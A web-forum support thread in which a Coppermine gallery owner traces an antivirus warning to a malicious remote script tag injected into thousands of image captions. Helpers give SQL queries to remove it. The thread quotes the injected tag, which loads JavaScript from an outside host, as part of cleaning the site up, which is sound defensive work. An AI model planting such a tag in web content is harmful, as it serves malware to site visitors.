Author Topic: [Solved]: Avast warning about HTML:Script-inf  (Read 34027 times)


redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
[Solved]: Avast warning about HTML:Script-inf
« on: March 27, 2009, 01:43:01 AM »

Hello and thank you for a great product.

A couple of days ago I was struck with malware on my Coppermine site.
So I started to google for answers and found this that I followed
http://forum.coppermine-gallery.net/index.php/topic,51671.0/prev_next,next.html#new

So I thought I had cleaned the site using WinMerge and the guide plus upgrading to the latest version (Coppermine Photo Gallery 1.4.21 (stable)).
Then I got reports that it still was infected with malware called HTML:Script-inf.
I could not believe this because it was/is squeaky clean. The only unique files are those explained in the link, plus my album stuff (jpg and flash files).
So I downloaded Avast and updated to the latest version. And found some evil code

(attached file)
This is the interesting part
<!-- BEGIN caption -->
                                <tr>
                                        <td class="tableb"><center>
                                                <script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
                                        </center></td>
                                </tr>
<!-- END caption -->

Problem is that I cannot find this code on my site (searched every file on the site for this text without luck). This is generated somehow, from what I do not know.

Link to the infected part:
http://www.fanvadnajs.se/coppermine/displayimage.php?album=108&pos=0

Any assistance would be appreciated.
« Last Edit: March 27, 2009, 09:56:26 PM by Joachim Müller »
Logged

Nibbler

  • Guest
Re: Avast warning about HTML:Script-inf
« Reply #1 on: March 27, 2009, 04:44:30 AM »

That code has been set as the caption for all your files (so it's in the database not a file). You'll need to set new captions for all your files.
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: Avast warning about HTML:Script-inf
« Reply #2 on: March 27, 2009, 08:54:57 AM »

Thank you so much  ;D
I opened my phpMyAdmin and did a search on the address.
I found the following:
6027 match(es) inside table cpg149_pictures

Now I have a couple of questions.
1.   How do I clean this? I'm no expert in phpMyAdmin, but I guess that I could individually remove each line of code 6027 times. I'm guessing there is a faster way.
2.   Does anyone know how this happened? Yes, this is a lack of security, but where? Do I need to tell my host to upgrade software or is the fault mine?
This probably happened when I had the older version of Coppermine, but now it's upgraded.
3.   How do I stop this from happening again? Any tip would be welcome.

I have included two files to assist you in your answers.
The exported cpg149_pictures database and myphpinfo from coppermine.

And thank you again.
Logged

Nibbler

  • Guest
Re: Avast warning about HTML:Script-inf
« Reply #3 on: March 27, 2009, 02:47:42 PM »

Run this query in phpmyadmin to clean the captions:

Code: [Select]
UPDATE cpg149_pictures SET caption = ''
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: Avast warning about HTML:Script-inf
« Reply #4 on: March 27, 2009, 04:09:48 PM »

If I run
UPDATE cpg149_pictures SET caption = ''
Doesn't that remove all the comments also? I just want to remove the bad code.

Thank you for the help again.
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: Avast warning about HTML:Script-inf
« Reply #5 on: March 27, 2009, 04:40:27 PM »

Asked a friend that knows MySQL.
He gave me this code to run:

UPDATE cpg149_pictures SET caption = '' WHERE caption like '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'

That worked like a charm   :) :D ;D Removed all unwanted code but not the comments that I wanted to keep.

So now to question 2 and 3? Any ideas?

I just want everything to be up to specs. And for all other people that will have or have the same problem.

Thank you for all your help, I'm impressed by the speed with which I received help.
Logged
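
An added example, not part of the original posts: the cleanup from the replies above, written so that only the injected tag is stripped and any other caption text on the row is kept, with a backup and a check before and after. The table name, the caption column and the script URL are the ones quoted in the thread; the backup table name is an assumption.

```sql
-- Added example for MySQL (run from phpMyAdmin's SQL tab).
-- Names come from the thread except cpg149_pictures_backup, which is hypothetical.

-- 1. Keep a copy of the table before changing anything.
CREATE TABLE cpg149_pictures_backup AS
SELECT * FROM cpg149_pictures;

-- 2. Count the rows that carry the injected tag (the thread reports 6027 matches).
SELECT COUNT(*) AS infected_rows
FROM cpg149_pictures
WHERE caption LIKE '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%';

-- 3. Look at a few of them to see whether real caption text surrounds the tag.
SELECT caption
FROM cpg149_pictures
WHERE caption LIKE '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'
LIMIT 20;

-- 4. Remove only the tag. SET caption = '' would also discard any legitimate
--    caption text on a matching row; REPLACE() leaves the rest of the field intact.
UPDATE cpg149_pictures
SET caption = REPLACE(
        caption,
        '<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>',
        '')
WHERE caption LIKE '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%';

-- 5. Confirm nothing script-like is left in the column. A non-zero count here
--    means a differently written tag is present and needs its own review.
SELECT COUNT(*) AS remaining_script_tags
FROM cpg149_pictures
WHERE caption LIKE '%<script%';

-- 6. Once the gallery pages render cleanly, drop the backup.
-- DROP TABLE cpg149_pictures_backup;
```

REPLACE() matches case-sensitively, so step 5 is what catches a variant of the tag written with different capitalisation or spacing.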

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47844
  • aka "GauGau"
    • gaugau.de
Re: Avast warning about HTML:Script-inf
« Reply #6 on: March 27, 2009, 09:56:15 PM »

The fields "caption" and comments posted on a file (residing in another table) are different animals.
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: [Solved]: Avast warning about HTML:Script-inf
« Reply #7 on: March 27, 2009, 10:12:24 PM »

Ah ok, well I was unsure, so I guess both of the queries would have worked then. ::)
Logged